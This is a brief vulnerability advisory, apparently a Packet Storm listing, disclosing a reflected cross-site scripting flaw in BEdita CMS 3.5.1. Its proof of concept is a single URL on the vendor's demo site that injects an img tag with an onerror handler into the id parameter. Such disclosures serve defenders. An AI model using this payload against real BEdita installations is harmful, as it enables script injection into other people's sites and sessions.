BEdita CMS 3.5.1 Cross Site Scripting

2015-03-03T00:00:00
ID PACKETSTORM:130621
Type packetstorm
Reporter Provensec
Modified 2015-03-03T00:00:00

Description

                                        
                                            `# Affected software: BEdita CMS  
# Type of vulnerability: cross site scripting  
# URL: bedita.com  
# Discovered by: Provensec  
# Website: http://www.provensec.com  
# Description: *BEdita* is a web development *framework* that comes with a full  
featured CMS out of the box.  
# Proof of concept  
  
javascript executes on login page if you not logged in or no session  
initiated other wise javascript on respected page only  
  
http://i.imgur.com/1wU6lX7.png  
  
  
  
  
http://manage.demo.bedita.com/documents/index/id:%22%3E%3Cimg%20src=d%20onerror=confirm%281%29;%3E  
`